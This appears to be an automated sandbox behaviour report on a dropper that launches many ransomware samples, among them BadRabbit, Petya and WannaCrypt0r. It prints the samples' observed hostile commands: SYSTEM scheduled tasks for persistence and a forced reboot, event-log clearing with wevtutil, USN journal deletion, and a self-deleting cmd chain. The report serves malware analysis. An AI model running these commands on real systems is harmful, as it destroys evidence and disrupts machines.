        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000406423 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004065CC instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000421A1F instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000421BD2 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000421D80 instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 00000000004222EE instructions caused by: Self-modifying code
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeSpecial instruction interceptor: First address: 0000000000408583 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000427F61 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000407F6E instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000427E90 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000426E28 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004274B2 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000406423 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004065CC instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000420BFA instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004079F8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000405BE6 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000426B2B instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000408583 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 0000000000427B20 instructions caused by: Self-modifying code
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeSpecial instruction interceptor: First address: 000000000042617F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000407369 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFC185h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007FBC1CDFB751h 0x0000001d jmp 00007FBC1CDFB8F5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429FC1 second address: 0000000000429FC1 instructions: 0x00000000 rdtsc 0x00000002 xor eax, ebx 0x00000004 mov ecx, eax 0x00000006 rol eax, cl 0x00000008 pop ebx 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d ret 0x0000000e push edx 0x0000000f mov ebx, 00000800h 0x00000014 call 00007FBC1CDFC378h 0x00000019 push ebx 0x0000001a rdtsc
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429E29 second address: 0000000000429E0C instructions: 0x00000000 rdtsc 0x00000002 xor eax, ebx 0x00000004 xor edx, edx 0x00000006 mov ebx, 00000100h 0x0000000b div ebx 0x0000000d mov byte ptr [esi], dl 0x0000000f inc dword ptr [esp+08h] 0x00000013 inc dword ptr [esp] 0x00000016 inc dword ptr [esp+04h] 0x0000001a cmp dword ptr [esp+04h], 18h 0x0000001f jne 00007FBC1CDFB7F9h 0x00000021 cmp dword ptr [esp+08h], 08h 0x00000026 jne 00007FBC1CDFB8A6h 0x00000028 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeRDTSC instruction interceptor: First address: 0000000000429E58 second address: 0000000000429E58 instructions: 0x00000000 rdtsc 0x00000002 xor edx, edx 0x00000004 xor eax, ebx 0x00000006 mov ebx, 00000100h 0x0000000b div ebx 0x0000000d mov byte ptr [esi], dl 0x0000000f inc esi 0x00000010 inc ecx 0x00000011 cmp ecx, dword ptr [ebp-2Ch] 0x00000014 jne 00007FBC1CDFC0ECh 0x00000016 rdtsc
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFC185h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007FBC1CDFB751h 0x0000001d jmp 00007FBC1CDFB8F5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeRDTSC instruction interceptor: First address: 0000000000420882 second address: 0000000000425771 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 mov ebx, 00002328h 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d mov eax, 00001770h 0x00000012 add eax, edx 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 push eax 0x00000018 push 00000013h 0x0000001a call dword ptr [ebp+08h] 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 sub esp, 08h 0x00000023 rdtsc
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeRDTSC instruction interceptor: First address: 000000000040108E second address: 0000000000401122 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 xor eax, edx 0x00000005 popad 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b xor ecx, ecx 0x0000000d lea esi, dword ptr [00401250h] 0x00000013 pushad 0x00000014 rdtsc
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeRDTSC instruction interceptor: First address: 0000000000401122 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFC185h 0x0000000b xor dword ptr [esi], eax 0x0000000d pushad 0x0000000e rdtsc
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeRDTSC instruction interceptor: First address: 00000000004011B0 second address: 00000000004011B0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007FBC1CDFB8F5h 0x0000000b add esi, 04h 0x0000000e add ecx, 04h 0x00000011 cmp ecx, 000004F3h 0x00000017 jl 00007FBC1CDFB751h 0x0000001d jmp 00007FBC1CDFB8F5h 0x00000022 xor dword ptr [esi], eax 0x00000024 pushad 0x00000025 rdtsc
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeRDTSC instruction interceptor: First address: 0000000000420882 second address: 0000000000425771 instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 mov ebx, 00002328h 0x00000009 xor edx, edx 0x0000000b div ebx 0x0000000d mov eax, 00001770h 0x00000012 add eax, edx 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 push eax 0x00000018 push 00000013h 0x0000001a call dword ptr [ebp+08h] 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 sub esp, 08h 0x00000023 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\dispci.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\yeYUggIg\rCUUIQEQ.exeLast function: Thread delayed
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qfvdb0vr.1x3\Endermanch@Antivirus.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kql13vqd.ufc\Endermanch@AntivirusPlatinum.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsUpdate.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dllJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ihramkff.aqi\Endermanch@ViraLock.exeJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\cscc.datJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h21abmmw.gcd\Endermanch@AnViPC2009.exeJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi2B2E.tmpJump to dropped file
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iptzuyxi.lvf\Endermanch@FakeAdwCleaner.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,4_2_04A48B2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,4_2_04A47D4E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,4_2_04A48D39
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeAPI call chain: ExitProcess graph end nodegraph_3-13289
        Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
        Source: rundll32.exe, 00000004.00000002.366802386.0000000004B7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: rundll32.exe, 00000004.00000002.362921549.000000000334B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP;
        Source: 4W5dQXszUV.exe, 00000000.00000003.356528021.0000020A36D72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\DCD7.tmpProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,4_2_04A45A73
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004048F8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_004048F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,4_2_04A45E9F
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,4_2_04A49016
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_008810C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_008810C0
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeProcess token adjusted: Debug
        Source: C:\Windows\DCD7.tmpProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeCode function: 1_2_00881499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,1_2_00881499

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.253.33.200 445Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeFile queried: C:\WINDOWS\Cursors\avp.exe
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe "C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 189355826
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
